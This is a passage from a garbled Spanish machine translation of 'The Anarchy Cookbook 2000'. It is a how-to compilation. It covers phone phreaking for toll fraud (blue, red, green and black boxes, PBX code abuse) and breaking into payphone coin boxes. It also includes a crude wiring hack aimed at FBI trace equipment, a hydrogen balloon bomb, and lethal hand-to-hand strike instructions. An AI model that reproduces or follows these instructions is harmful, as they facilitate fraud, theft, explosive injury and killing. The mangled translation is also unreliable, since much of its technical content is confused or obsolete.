Marcación:Como se dijo antes, Alianza Sólo en cierta declaró y sólo estos estados puedan acceder a ellos a través de marcación directa. Sin embargo, discado directo hace que su residencia se le cobrará por la conferencia y las facturas de la conferencia no son bajos!

Por lo tanto, muchos han sido descubiertos para iniciar una conferencia sin tener que facturar a la casa de los. Son los siguientes:

1. Marcación a través de una PBX.2. La incorporación de una caja azul.3. Factura a un bucle.4. Facturación a una llamada desviada.

Estoy seguro de que hay muchos más, pero estos son los cuatro que se ocupará.

Marcación a través de un PBX:Probablemente el método más fácil de crear una conferencia gratuita es a través de una centralita. Simplemente llame a uno en un estado que tiene Alianza, Entrada de código de la PBX, marque 9 para una línea exterior y luego marque la alianza. Un ejemplo de esto sería la siguiente:

PBX: 800-241-4911

Cuando se contesta que le dará un tono. En esta entrada el tono de su código.

Código: 1234

Después de esto usted recibirá otro tono, ahora marca 9 para obtener línea externa.Ahora se oye un tono de marcado. Sólo tiene que marcar Alianza desde este punto yla conferencia será facturado a la central.

Uso de una caja azul:Otra forma más sencilla de iniciar una conferencia con una caja azul. El siguiente procedimiento es la forma de caja de una conferencia:

Marque un número a la caja de fuera de. En este ejemplo vamos a utilizar 609-609-6099 Cuando el interlocutor conteste golpeó 2600Hz. Esto hará que el equipo de la compañía

Page 38: 106652012 the Anarchy Cookbook 2000 Es

Fone para pensar que se ha colgado. Oirá un <kerchunk> <beep> Ahora ha 'incautado' un tronco. Después de esto, cambiar a multi-frecuencia y marcar:

PK-0-700-456-ST-x00x• PK = KP tono en Blue Box• x = variable entre 1 y 3• ST ST = tono de Blue Box

El equipo ahora piensa que el operador ha marcado Alianza de su centralita y de la conferencia será facturado allí. Desde Azul El boxeo es un tema tan amplio, esto es lo que yo voy a entrar en sus usos.

Facturación de un bucle:Un tercer método de recibir una conferencia libre es por facturación a un bucle. Un bucle es de 2 números que cuando dos personas lo llaman, pueden hablar el uno al otro. ¿Estás diciendo que woop-ti-hacer las cosas bien? ¡Falso! Los bucles pueden ser útiles para <very> phreaks. En primer lugar, marque alianza directa. Después de pasar por el procedimiento de inicio, que será discutido más adelante en este tutorial, marque el 0 y esperar una Alianza operador. Cuando ella responde a decirle que le gustaría que le facture la conferencia de tal y tal número. (Un ciclo donde su phriend es en el otro lado) A continuación, se llama a ese número para recibir la verificación de voz. Por supuesto, su phriend se espera y acepta los cargos. Así, la conferencia se factura al bucle.

Factura mediante el desvío de llamadas:Cuando usted marca un número que es llamada desviada, primero se contestó por la ubicación original, y luego reenviado. La ubicación original colgará si 2600Hz se recibe de un solo extremo de la línea. Por lo tanto, si usted fuera a esperar después de la residencia remitido contestó, usted recibe un tono de la ubicación original de marcación.

Ejemplo:Marque 800-325-4067

La residencia original respondía, a continuación, enviar la llamada, un segundo tipo de timbre que se escucha. Cuando esto responde a la segunda residencia, simplemente esperar hasta que se cuelgue. Después de unos veinte segundos, a continuación, recibirá el tono de la residencia original de la línea, ya que escuchó 2600Hz desde un extremo de la línea. Sólo tiene que marcar Alianza desde este punto y la conferencia serán facturados a la residencia original. Estas son las cuatro formas principales para recibir una conferencia gratuita. Estoy seguro de queexisten muchos más, pero estos cuatro son muy útiles a sí mismos.

Inicio de sesión de procedimiento:Una vez Alianza respuestas que usted escuchará una combinación de dos tonos. Esta es su forma de decir '¿Cuántas personas que desee en la conferencia de amigo? Sólo tienes que escribir en una combinación de dos dígitos, dependiendo de lo que puente de Alianza que se encuentra, entre el 10 y 59. Después de esto ya sea golpeado '*' para cancelar la conferencia y el tamaño de entrada de otro o golpear '#' para continuar. Ahora se encuentra en teleconferencia de la Alianza y están a sólo unos segundos de tener su propia conferencia de rugir va fuerte!

Marcación de los conferencistas:Para marcar su primera conferenciante, marque 1 + NPA + pre + suf y esperan su / su respuesta.

NPA = el código de áreapre = prefijosuf = sufijo

Si el número está ocupado, o si nadie contesta simplemente presione '*' y su llamada será abortado. Pero, si lo hacen respuesta, golpeó la tecla "#". Esto les agregar a la conferencia. Ahora comenzará a marcar conferenciantes otros.

Page 39: 106652012 the Anarchy Cookbook 2000 Es

Se incorporen a la Conferencia:Para unirse a la conferencia del modo de control simplemente pulse la tecla "#". Dentro de uno o dos segundos se le chatear con todos tus amigos. Para volver al modo de control, sólo tienes que presionar la tecla '#' de nuevo.

La transferencia de control:Para transferir el control a otro conferenciante, entra en modo de control, golpeó el # 6 +1 + NPA + pre + suf del conferenciante que desea dar el control a. Si después, desea abortar la transferencia de golpear la tecla '*'.

NOTA: La transferencia de control a menudo no es disponible. Cuando se recibe un mensaje que indica esto, usted simplemente no puede transferir el control.

Conferencias silenciado:Para solicitar una conferencia silenciado simplemente pulse la tecla 9. No estoy exactamente seguro de lo que una conferencia es silenciado, pero es probable que sea una manera de impedir que los intrusos no deseados de escuchar pulg

Discado Alianza Operadores:Simplemente marque el 0 como lo haría desde cualquier fone y esperar a que el operador de responder.

Interrumpiendo su Conferencia:Para finalizar su conferencia de todos juntos, que es de todos incluido usted mismo saque de fuera, entra en modo de control y pulsa "*" ... después de unos segundos, simplemente cuelgue el teléfono. Su conferencia ha terminado.

¿Son Alianza Operadores peligrosos?No. No en lo más mínimo. Lo peor que puede hacer para usted mientras usted está teniendo una conferencia es retirar todos los conferenciantes incluyéndolo a usted. Esto no es en absoluto perjudicial, sólo un poco irritante.

Alianza y seguimiento:Alianza se puede rastrear, ya que todos los ciudadanos de la Estados Unidos puede. Pero esto tiene que ser todo premeditado y AT & T tiene que ser llamado y es realmente una molestia grande, por lo tanto, casi nunca se hace. Alianza simplemente no quieren que se sepa que los adolescentes se les Phucking más. El único tipo de equipo de seguridad Alianza tiene en línea es un registro simple bolígrafo. Este pequeño dispositivo, simplemente registra todos los números de los conferenciantes marcado. No es gran cosa. Todo Alianza puede hacer es llamar a ese número las personas, amenazan y que se trate. Sin embargo, legalmente, no pueden hacer nada porque todo lo que hizo fue responder a su fone.

NOTA: Casi todas las instrucciones se les dice a la persona al mando de Alianza grabaciones. Gran parte de este tutorial es sólo una lista de estos comandos, además de la información reunida por mí ni de los phreaks phellow del mundo!

38. Caja de Agua los planes del Jolly Roger

Cada vida phreaker verdaderos en el temor de "Lock In Trace 'el temido FBI. Durante mucho tiempo, era imposible escapar de la cerradura en Trace. Este cuadro sí ofrece una ruta de escape con instrucciones simples a la misma. Este cuadro es un concepto muy simple, y casi cualquier phreaker con conocimientos básicos de la electrónica se puede construir y utilizar.

El bloqueo en seguimientoUn bloqueo en el rastro es un dispositivo utilizado por el FBI para que encaje en la ubicación del teléfono los usuarios para que no se puede colgar mientras un rastro está en curso. Para aquellos de ustedes que no están familiarizados con el concepto de "bloqueo en ', entonces aquí hay una breve descripción. El FBI puede tocar en una conversación, algo así como una conexión de llamada de tres vías. Luego, cuando llegan

Page 40: 106652012 the Anarchy Cookbook 2000 Es

allí, se puede conectar la electricidad en la línea telefónica. Todas las conexiones telefónicas se mantiene abierto por un cierto voltaje de la electricidad. Es por eso que a veces uno tiene conexiones estáticas y débil cuando están llamando lejos, porque la electricidad tiene problemas para mantener la línea de arriba. Lo que el bloqueo en el rastro no se corta en la línea y generar esa misma tensión directamente en las líneas. De esta manera, cuando usted trata de colgar, la tensión se mantiene. Su teléfono sonará como si alguien te llamaba, incluso después de colgar el teléfono. (Si la llamada en espera, usted debe entender mejor acerca de que, para la llamada en espera intercepta la electricidad y hace un sonido que significa que alguien está pasando por su línea. Entonces, es una cuestión de que la tensión es mayor. Al empujar hacia abajo el receptor, a continuación, subibajas la electricidad hacia el otro lado. Cuando usted tiene una persona en cada línea, es imposible para colgar a menos que uno de ellos o ambos se cuelgue. Si usted trata de colgar, la tensión se mantiene, y su teléfono sonará. Eso te dará una comprensión de cómo llamar a las obras. Además, cuando la electricidad pasa a través de un cierto punto en el teléfono, la electricidad hace que una campana para que suene, o en algunos teléfonos nuevos de un anillo electrónico a sonar.) Por lo tanto , con el fin de eliminar la traza, de alguna manera debe bajar el nivel de tensión en la línea telefónica. Usted debe saber que cada vez que alguien toma la línea telefónica, la tensión hace disminuir un poco. En los primeros pasos de la planificación de esto, Xerox sugiere conseguir un centenar de teléfonos todos los enganchados en la misma línea que todos pudieran ser tomadas fuera del gancho, al mismo tiempo. Esto sería de gran disminuir el nivel de tensión. Por eso también la mayoría de las tres vías conexiones que utilizan el servicio de botones llamada en conferencia (que es de sólo $ 3 al mes) se vuelven muy débiles después de un tiempo. A estas alturas, usted debe entender la idea básica. Usted tiene que drene todo el poder fuera de la línea por lo que la tensión no puede mantenerse. Más bien pronto el drenaje de la energía podrían rápidamente cortocircuito en la máquina de tensión del FBI, ya que fue construida sólo para mantener el voltaje exacto necesario para mantener la tensión de salida. Por el momento, imaginar esto. Uno de los generadores de Radio Shack normales que usted puede ir a recoger a que un extremo del cable que se conecta en la caja central dispone de una toma de teléfono en él y el otro tiene un enchufe eléctrico. De esta manera, puede "flash" de voltaje a través de la línea, pero no puede drenar. Así, algunosmodificaciones tienen que hacerse.

MaterialesUn AOEB (zócalo básico de salida eléctrica), como una pequeña lámpara de tipo de conexión, en la que sólo tienen un simple enchufe y el cable que se conecta a una bombilla. Uno de los cables se mencionó anteriormente, si usted no puede encontrar uno, entonces la construcción de su propia ... Conexión de la tensión en la misma, pero la inmovilización debe ser construido en (es decir la caja central) Dos tomas de teléfono (una para el módem, uno para si usted está siendo trazado para conectar la caja de agua en) algo de creatividad y el trabajo fácil.

Aviso: No hay teléfonos tienen que ser destruidos / modificados para hacer este cuadro, así que no vayas a comprar un teléfono nuevo para él!

ProcedimientoMuy bien, este es un procedimiento muy simple. Si usted tiene la AOEB y podría descargar en cualquier cosa: una radio, o lo que sea. El propósito de contar con que se va a chupar la tensión de salida de la línea telefónica en el aparato eléctrico, de manera que no habría tensión de izquierda a lo encierre con.

1. Tome el cable de conexión. Examine el enchufe en el extremo. Se debe tener solamente dos púas. Si tiene tres, aún así, no temen. Asegúrese de que el electrodoméstico esté apagado a menos que quiera convertirse en un bicho crujiente mientras que hace esto. La mayoría de los enchufes tendrá un diseño de plástico duro en la parte superior de ellos para evitar que entre en contacto con los cables eléctricos en el interior. Bueno, retírelo. Si desea mantener el tapón (no veo por qué ...), entonces le retira la parte superior. Cuando se mira en el interior, bajo y he aquí, verás que en la base de los dientes no son un par de cables de conexión in Los cables a cabo el poder en el aparato. Así pues, con cuidado desenvuelva los de los lados y tire hacia fuera hasta que estén alrededor de una pulgada por

Page 41: 106652012 the Anarchy Cookbook 2000 Es

delante de los dientes. Si no desea mantener la toma, a continuación, sólo extraer las puntas hacia fuera. Si es así, cubrir las puntas con cinta aislante para que no se conectan con los cables cuando el poder se está drenando de la línea.

2. Haga lo mismo con las patas del enchufe del otro, por lo que tiene los cables conectados de manera uniforme. Ahora, envuelva el extremo de los cables alrededor de la otra. Si le sucede que tiene el otro extremo del cable de tensión conectado en el teléfono, deje de leer ahora, usted es demasiado estúpido para continuar. Después de que ha cumplido con los cables alrededor de la otra, cubrir todo con los enchufes con cinta aislante. Entonces, si usted construyó su propia caja de control o si usted compró uno, y luego meter todos los cables en ella y volver a cerrar la misma. Esa caja es su boleto para salir de esto.

3. Vuelva a revisar todo lo posible para asegurarse de que todo está en su lugar. Esta es una conexión muy débil, pero en los modelos posteriores, cuando tengas más experiencia en la que a continuación se puede soldar lejos en ella y formar todo el dispositivo en una caja grande, con algún tipo de obra barata de mano de Mattel juego interior como el poder conector. Para usarlo, simplemente mantener este cuadro de la mano. Conéctelo a la toma si quieres, pero poco a bajar el voltaje por lo que no está conectado. Cuando lo conectes, si usted ve chispas, desconecte y vuelva a la cosa entera. Pero si apenas se parece bien, entonces lo dejo.

Utilizar----Ahora, por lo que tiene enchufado todo el asunto en todos y ... No use esta a menos que la situación es desesperada! Cuando el trazado se ha ido, no se preocupe, desconecte el teléfono, y encienda el aparato que estaba conectado a. Se necesita energía para que se encienda, y esto es una gran fuente ... La tensión para mantener una línea de teléfono abierta es bastante pequeña y una simple bombilla debe drenar todo en corto y, probablemente, el equipo del FBI, al mismo tiempo.

39. Hindenberg Bomb de The Jolly Roger

Se necesita:

• Un globo• 1 Botella• 1 Plomero Líquido• 1 pieza de papel de aluminio• 1 Longitud del fusible

Llenar la botella de 3/4 partes con el plomero líquido y añadir un pequeño pedazo de papel de aluminio a la misma. Poner el globo sobre el cuello de la botella hasta que el globo está lleno del gas resultante. Este es hidrógeno altamente inflamable. Ahora atar el globo. Ahora encender la mecha, y dejar que suba. Cuando los contactos de los fusibles del globo, tenga cuidado!

40. ¿Cómo matar a alguien con las manos por la Jolly Roger

Este archivo se explican los conceptos básicos de combate cuerpo a cuerpo, y hablan de los mejores lugares para golpear y matar a un enemigo. Cuando se activa en el combate cuerpo a cuerpo, su vida siempre está en juego. Sólo hay un objetivo en el combate, y que es matar a tu enemigo. Nunca enfrentamos a un enemigo con la idea de noquearlo. Las posibilidades son muy buenas que te va a matar en su lugar. Cuando un arma no está disponible, se debe recurrir a la plena utilización de sus armas naturales. Las armas naturales son los siguientes:

1. El filo de la navaja de sus manos.2. Dedos doblados en la articulación del segundo o los nudillos.3. La bola que sobresale de su segundo dedo.4. El talón de su mano.

Page 42: 106652012 the Anarchy Cookbook 2000 Es

5. Su arranque6. Codos7. Rodillas8. Los dientes.

Atacar es un factor primordial. Una lucha que nunca fue ganado por la acción defensiva. Ataca con todas tus fuerzas. En cualquier momento o cualquier situación, un punto vulnerable en su cuerpo los enemigos estarán abiertos para el ataque. Haga esto mientras gritaba como gritos tiene dos propósitos.

1. Para asustar y confundir al enemigo.2. Para que usted pueda tomar una respiración profunda que, a su vez, poner más

oxígeno en su torrente sanguíneo.

Su balance y el equilibrio de tu enemigo son dos factores importantes, ya que, si usted tiene éxito en hacer que tu enemigo pierda el equilibrio, las posibilidades son nueve a uno que se le puede matar en su próximo movimiento. Lo mejor sobre todo-la postura es que sus pies se extienden sobre la anchura de los hombros separados, con el pie derecho sobre un pie delante de la izquierda. Ambos brazos deben estar doblados por los codos paralelos el uno al otro. Párese en la punta de los pies y doblar la cintura ligeramente. Algo así como agachado de un boxeador. El empleo de un movimiento brusco o un grito o alarido puede lanzar a tu enemigo fuera de balance. Hay muchos puntos vulnerables del cuerpo. Vamos a cubrir ahora:

Ojos: Usa tus dedos en forma de V y el ataque en movimiento especulación.

Nariz: (extremadamente vulnerables) Golpe con el filo de la mano a lo largo del puente, que va a provocar la rotura, dolor agudo, ceguera temporal, y si el golpe es bastante difícil, la muerte. Además, dar un golpe con la palma de tu mano en un movimiento hacia arriba, esto empuja el hueso hacia el cerebro que causa la muerte.

Manzana de Adán: Este lugar es por lo general bastante bien protegida, pero si tienes la oportunidad, la huelga duro con el filo de la navaja de la mano. Esto debe cortar la tráquea, y luego se acabó en cuestión de minutos.

Templo: Hay una gran arteria hasta aquí, y si la golpea con suficiente fuerza, que causa la muerte. Si te las arreglas para golpear a tu enemigo hacia abajo, darle una patada en el templo, y él nunca levantarse de nuevo.

Parte posterior del cuello: Un golpe de conejo, o un golpe entregado a la base del cuello, fácilmente se puede romper, pero para estar seguros, es mejor utilizar la culata de un arma o algún otro objeto contundente pesado.

Labio superior: Una gran red de nervios que se encuentran. Estos nervios están muy cerca de la piel. Un golpe al alza brusca causará mucho dolor y pérdida del conocimiento.

Orejas: Viniendo desde atrás a un enemigo y poner las manos en un movimiento de palmas sobre los oídos de las víctimas puede matarlo de inmediato. Las vibraciones causadas por el movimiento de las palmas va a estallar los tímpanos, y causar una hemorragia interna en el cerebro.

Ingle: un lugar muy vulnerable. Si se deja abierto, que se obtiene con codo duro, y va a abrocharse el cinturón en muy rápido.

Riñones: un gran nervio que se ramifica a la médula espinal está muy cerca de la piel en los riñones. Un golpe directo con el filo de la navaja de la mano puede causar la muerte.

Hay muchas más formas de matar y herir a un enemigo, pero debe trabajar mejor para la persona promedio. Esto se entiende solamente como información y que no recomendaría que utilice esto para un Brawl Escuela Secundaria simple. Utilice estos métodos sólo, en su opinión, si su vida está en peligro. Cualquiera de estos métodos podría muy fácilmente

Page 43: 106652012 the Anarchy Cookbook 2000 Es

matar o causar daño permanente a alguien. Una palabra más de precaución, usted debe practicar estos movimientos antes de usarlos en un maniquí, o un simulacro de batalla con un amigo. (Usted no tiene que golpear realmente a practicar, sólo el trabajo de precisión.)

41. Sistemas de Teléfono Tutorial III por The Jolly Roger

Prefacio:Este artículo se centrará principalmente en el oeste de la moneda estándar de telefonía eléctrica de una sola ranura (también conocido como fortaleza de fone) que puede dividirse en 3 tipos:

• tono de marcado en primer lugar (DTF)• monedas en primer lugar (cf): (por ejemplo, quiere sus $ antes de recibir un tono

de llamada)• llamar post-pago de servicios (pp): payafter que las respuestas del partido

Monedas de depósito (babosas):Una vez que haya depositado su babosa en una fortaleza, que se somete a una gama de pruebas. El primer obstáculo para una babosa es la trampa magnética. Esto evitará que las babosas de peso ligero magnéticas y monedas. Si pasa esto, la babosa se clasifica como un cinco, diez, o el barrio. Cada lingote se comprueba por el tamaño y peso apropiado. Si estas pruebas se pasan, que luego viajará a través de un cinco, diez, o imán trimestre, según corresponda. Estos imanes crear un efecto de corriente de Foucault lo que hace que las monedas de las características apropiadas para reducir la velocidad por lo que seguirá la trayectoria correcta. Si todo va bien, la moneda seguirá el camino correcto (por ejemplo, saltando en el yunque de níquel) en el que se espera que caiga en el canal de monedas aceptado estrecho. Las pruebas más complejas que se realizan en la moneda viaja por el conducto de la moneda se detendrá la mayoría de las babosas y otras monedas indeseables, tales como peniques, que luego deben ser recuperados utilizando la palanca de liberación de la moneda. Si la babosa milagrosamente sobrevive a la gama, entonces se golpee el brazo totalizador apropiado causando una rueda de trinquete para girar una vez por cada incremento de 5-ciento (por ejemplo, un cuarto hará que gire 5 veces). El totalizador continuación, hace que el oscilador de señal de moneda a la lectura de una señal de doble frecuencia que indica el valor depositado a los actos (un ordenador) o el operador de TSP. Estos son los mismos tonos utilizados por phreaks en los cuadros rojos infames. Durante un cuarto, 5 pitidos se pulsada hacia el exterior a 12-17 pulsaciones por segundo (pps). Una moneda de diez centavos hace 2 pitidos en el 5 - 8 ½ pps, mientras que un níquel provoca un pitido en el 5 - 8 pps y medio. Una señal sonora se compone de 2 tonos: 2200 + 1700 Hz. Un relevo en la fortaleza llamada el "relé B" (sí, también hay un "un relevo") coloca un condensador en el circuito del habla durante la lectura del totalizador para evitar que el "cliente" al escuchar los tonos de la caja de color rojo. En mayores de 3 teléfonos tragamonedas: una campana (1150/00 Hz) por cinco centavos, dos campanas de una moneda de diez centavos, y un gong (800 Hz) para una cuarta parte se utiliza en lugar de los modernos tonos de doble frecuencia.

TSPS y ACTOSMientras que las fortalezas están conectados a la cooperación de la zona, todas las transacciones se manejan a través del sistema de tránsito posición de servicio (TSP). En las zonas que no cuentan con los actos, todas las llamadas que requieran asistencia de un operador, tales como tarjeta de llamada y recoger, se envía automáticamente a una posición de operador de cucharaditas. En un esfuerzo por automatizar el servicio de fortaleza, un sistema informático conocido como servicio automatizado al número de monedas (los actos) se ha aplicado en muchas áreas. Hechos escucha las señales de caja roja de los fones y toma las medidas adecuadas. Se trata de actos que, dice, "dos dólares por favor, (pausa), por favor depósito de dos dólares para los próximos diez segundos" (y otras variantes). Además, si usted habla de más de tres minutos y luego colgar, actos volverá a llamar y exigir su dinero. Hechos es también responsable del servicio de tarjeta de llamada automática. Hechos también proporcionan diagnóstico de averías de los artesanos (reparadores especializados en fortalezas). Por ejemplo, hay una prueba de la moneda que es ideal para afinar cajas de color rojo. En muchas áreas, esta prueba puede ser activado llamando al 09591230 en una fortaleza (gracias a Karl

Page 44: 106652012 the Anarchy Cookbook 2000 Es

Marx para esta información). Una vez que se activa le pedirá que depositar varias monedas. A continuación, se identifican la moneda y outpulse la señal apropiada caja roja. Las monedas se devuelven cuando se cuelgue. Para asegurarse de que en realidad hay dinero en el fono, el co inicia una "prueba de tierra" en varias ocasiones para determinar si una moneda está realmente en el fono. Es por eso que debe depositar al menos una moneda con el fin de utilizar una caja de color rojo!

Green Cajas:El pago de la tasa inicial con el fin de utilizar una caja de color rojo (en ciertas fortalezas) dejó un sabor amargo en la boca de muchos boxer rojo por lo tanto el cuadro verde fue inventado. El cuadro verde genera tonos útiles, tales como moneda de recolectar, el rendimiento de la moneda, y timbrado. Estos son los tonos que los actos o el operador cucharaditas enviaría a la cooperación, cuando proceda. Desafortunadamente, la caja verde no puede ser utilizado en una estación de fortaleza, sino que éste debe ser utilizado por la parte llamada.

Éstos son los tonos:Recoger monedas 700 + 1 100 HzDe devolución de monedas 1100 + 1700 HzTimbrado 700 + 1 700 Hz

Antes de la fiesta llamada envía cualquiera de estos tonos, el operador lanzó la señal debe ser enviada a alertar a los detectores de ondas hectométricas en la cooperación. Esto puede lograrse mediante el envío de 900 + 1.500 Hz o una sola guiño 2600 Hz (90 ms), seguido por un hueco de 60 ms y, a continuación la señal apropiada para al menos 900 Sra.

Además, no hay que olvidar que la velocidad inicial se recogen poco antes de que el período de 3 minutos es demasiado. Dicho sea de paso, una vez que los tonos MF anteriores para la recogida y devolución de monedas llegar a la cooperación, que se convierten en un adecuado impulso de corriente continua (-130 voltios para el retorno y +130 voltios para cobrar). Este pulso es enviado hacia abajo la punta de la fortaleza. Esto hace que el relé de monedas para devolver o recoger las monedas. La supuesta "t-red" se aprovecha de esta información. Cuando un pulso de moneda de recolectar (130 VCC) se envía por la línea, debe estar conectado a tierra en alguna parte. Esto es generalmente el cable amarillo o negro. Así, si los cables están expuestos, estos cables se pueden cortar para evitar que el pulso de ser conectada a tierra. Cuando el período de tres minutos es casi inicial, asegúrese de que los cables negro y amarillo se cortan, a continuación, cuelgue, espere unos 15 segundos en el caso de un segundo impulso, vuelva a conectar los cables, levante el fono, cuelgue de nuevo, y si todo va bien debería ser "jackpot" del tiempo.

Ataque físico:Una fortaleza típica pesa aproximadamente 50 libras. Con una caja de monedas vacía. La mayor parte de esto se explica en el blindaje. ¿Por qué tanta seguridad? Bueno, Campana contribuye a la siguiente: "Los cambios sociales durante la década de 1960 ha hecho de la estación de la moneda multislot un objetivo prioritario para:. el vandalismo, el robo brazo fuerte, el fraude y el robo del servicio Esto trajo consigo la introducción de la más resistente sola estación moneda de la ranura y una nuevo entorno para el servicio de la moneda. " En cuanto a forzar la cerradura, voy a citar al Sr. Phelps: "A menudo fantasean acerca de" forzar la cerradura "o" conseguir una clave maestra. " Bueno, usted puede olvidarse de él que no me gusta desanimar a la gente, pero te salvará de perder mucho de nuestro tiempo -.. Tiempo que se puede hacer un mejor uso (je, je) " En cuanto a ataque físico, la placa de moneda está asegurada en todo lado cuatro por pernos de acero endurecido que pasan a través de dosranuras cada uno. Estos pernos son a su vez enclavado por el bloqueo principal. Una Phreak sé se las arregló para tomar uno de la casa de los 'madres' (que se adjunta a un pedazo de madera en una obra;! De lo contrario, los permanentes son una perra se desprenda de la pared). Le llevó casi diez horas para abrir la caja de monedas utilizando un taladro eléctrico, martillos y barras de hierro (que estaba vacío-tal vez la próxima vez, va a depositar una moneda al aire primero en conocer si granizados abajo agradable o golpea la parte inferior vacía con un ruido.)

Page 45: 106652012 the Anarchy Cookbook 2000 Es

Tomando el fone ofrece un mayor margen de éxito. Aunque esto puede ser difícil a menudo requiere la fuerza bruta y no ha habido varios casos de los ejes traseros se pierden tratando de acabar con un fone! Una manera rápida y sucia para abrir la caja de monedas es el uso de una escopeta. En Detroit, Después de los ecologistas limpiar un estanque municipal, se encontraron 168 teléfonos de monedas saqueadas. En áreas más frías, como Canadá, un poco de cinta la gente astuta los fones con cinta adhesiva, vierta en el agua, y volver al día siguiente, cuando el agua se han congelado por lo tanto la expansión y formación de grietas en el Abierto de fone. En un caso, "los coleccionistas de monedas no autorizadas", donde capturados cuando trajeron a $ 6.000 en cambio a un banco y el banco comenzó a sospechar ... En todo caso, el bloqueo principal es una secadora nivel ocho situado en el lado derecho de la caja de la moneda. Este bloqueo tiene 390,625 posiciones posibles (5 ^ 8, ya que hay 8 tumbadores cada uno con 5 posiciones posibles) por lo que es altamente resistente a recoger! El bloqueo se mantiene en su lugar por 4 tornillos. Si no hay suficiente espacio libre a la derecha de la fone, es concebible para perforar los tornillos con el patrón de perforación a continuación (siempre por Alejandro Barroso en el grifo # 32):

! ^ ! ! ! 1 - 3/16 "! <------>! 1 - ½ " --------------------! ! ! ! ! ! ! (+) (+) -! ----------- ---! ! ! ^ ! ! ! ! ! ! ! (Z)! ! ! ! ! ! ! 2-3/16 " ---! ! ! ! ! (+) (+)! ! ! ! ! ! ------------------------------- ! ! (Z) Keyhole (+) TORNILLOS !

Después de esto se logra, la cerradura puede ser empujado hacia atrás desenganchar el bloqueo de la placa de cubierta. Los cuatro tornillos de la placa de cubierta puede entonces ser retraído girando las obras de los pernos con una llave simple en la forma del orificio en la placa de moneda (ver diagrama más abajo). Por supuesto, hay otros métodos y patrones de perforación.

_ ! ! () ! _! [Aproximadamente] ESQUEMA DE LA PLACA DE CUBIERTA DE OJO DE LA CERRADURA

La cubierta superior utiliza una similar, pero no como método de bloqueo fuerte con el ojo de la cerradura descrito más arriba en la piel superior izquierda y una cerradura normal (probablemente vaso también) en la parte superior del lado derecho. Es interesante experimentar con el canal de la moneda y las fortalezas propia "caja roja", que la campana no tiene las pelotas para el rojo.

Varios:En algunas áreas (rural y Canadá), Post-pago de servicios existe. Con este tipo de servicio, la boquilla se corta hasta que el dinero llama depósitos cuando la persona llamada contesta. Esto también permite llamadas gratuitas a tiempo y otros servicios de TI de acceso telefónico! Recientemente, 2600 revista anunciado la caja transparente que consta de una bobina de captación de teléfono y un pequeño amplificador. Se basa en el

Page 46: 106652012 the Anarchy Cookbook 2000 Es

principio de que el receptor es también un transmisor débil y que mediante la amplificación de la señal se puede hablar a través del transmisor evitando así costosos gastos de teléfono! La mayoría de las fortalezas se encuentran en la zona 9xxx. En las zonas antiguas de campana, por lo general comienzan en 98xx (justo debajo de la serie oficial 99xx) y se mueven hacia abajo.

Desde la línea, no el fone, determina si es o no un depósito se debe hacer, DTF y fones de carga de una llamada-que grandes extensiones! Por último, la fortaleza Fones permitir un nuevo pasatiempo - la placa de instrucciones de recolección. Todo lo que se necesita es un destornillador de punta plana y un par de alicates de punta fina. Sólo tiene que utilizar el destornillador para levantar debajo de la placa de modo que usted pueda agarrar con las pinzas y hacia abajo yanqui. Yo sugeriría que cubre las puntas de los alicates con cinta aislante para evitar que se raye. Diez placas ciento se convierte definitivamente en una "rareza!"

Fortaleza de la seguridad:Si bien una fortaleza solitaria puede parecer el blanco perfecto, ¡cuidado! La Gestapo se ha sabido para replantear fortalezas de hasta 6 años de acuerdo con las bases trimestrales. Para evitar cualquier problema, no utilice los mismos Fones en repetidas ocasiones por el boxeo, tarjetas telefónicas, y otros experimentos. La empresa de telecomunicaciones sabe cuánto dinero debe estar en la caja de monedas, y cuando no está allí que tienden a ser perturbado (Leído: Pissed Off).

42. Planes de Black Box de The Jolly Roger

Introducción:

En un momento dado, la tensión de correr a través del teléfono es de unos 20 voltios. Cuando alguien le llama, esta tensión se eleva a 48 voltios y los anillos de la campana. Al responder, el voltaje se reduce a unos 10 voltios. La empresa de telefonía presta atención a esto. Cuando el voltaje se reduce a 10, que comenzará a facturarle la persona que te llama.

Función:

La Caja Negro mantiene la tensión de ir a través de su teléfono en 36 voltios, por lo que nunca llega a 10 voltios. La compañía telefónica se lo deje engañar en pensar que nunca contestó el teléfono y no facturar a la persona que llama. Sin embargo, después de aproximadamente una hora y media de la compañía telefónica se comienza a sospechar y desconectar la línea durante unos 10 segundos.

Materiales:

• 1 1.8K ½ W Resistencia• 1 1 ½ V LED• Un interruptor unipolar

Procedimiento:

1. Abra el teléfono, aflojando los dos tornillos en la parte inferior y levantando el caso fuera.

2. Debe haber tres cables: rojo, verde y amarillo. Vamos a trabajar con el cable rojo.3. Conecte el siguiente paralelo:

• La resistencia y el LED.• El interruptor de SPST.

En otras palabras, usted debe terminar con esto: (Cable rojo) ! --- / \ / \ / \ - O -

Page 47: 106652012 the Anarchy Cookbook 2000 Es

(Línea) -----! ----- (Teléfono) ! -----_/_------! / \ / \ / \ = Resistencia O = LED _ / _ = SPST

Uso:

El interruptor unipolar es el de encendido / apagado de la Caja de Negro. Cuando el cuadro está apagado, el teléfono se comporta normalmente. Cuando el cuadro está encendida y el teléfono suena, el LED parpadea. Al responder, el LED permanezca encendido y la tensión se mantiene a 36 V, por lo que la persona que llama no se carga. Cuando el cuadro está activado, no recibirá un tono de llamada y por lo tanto no puede realizar llamadas. También recuerde que las llamadas están limitadas a la media hora.

PS Gracias a los nuevos sistemas de la compañía Fone conmutación y similares, esto puede o no puede trabajar en su área. Si usted vive en Bumfuck Kentucky, A continuación, intenta esto. Yo no garantizamos! (No puedo hacer ...)

43. La Historia de un crimen Caja Blotto! por The Jolly Roger

(Apuesto a que nadie tiene las bolas para construir este!)

Por último, ya está aquí! Lo que fue concebido primero como una broma para engañar a los inocentesphreakers alrededor América por fin ha sido concebido! Bueno, para ustedes que están no iluminados por la Caja de Blotto, aquí es un resumen breve de una leyenda.

La caja de BlottoDesde hace años, todos los piratas ha soñado con la Caja de Blotto. Fue en un primer momento hizo como una broma para burlarse de las personas más ignorantes en el pensamiento de que la función de lo que realmente era posible. Bueno, si usted es el maestro de tensión, es posible. Originalmente concebida por el rey Blotto de mucha fama, la Caja de Blotto por fin está disponible para el público.

NOTA: Jolly Roger no puede ser responsable de la información divulgada en el archivo! Este archivo es estrictamente para fines informativos y no debe ser realmente construido y utilizado! El uso de esta máquina impulsos electrónicos podrían tener graves los resultados se indican a continuación y podría resultar en un juicio federal de alta! Una vez más, no se hace responsable! Muy bien, ahora que eso se aclare, esta es la base de la caja y la función que es.

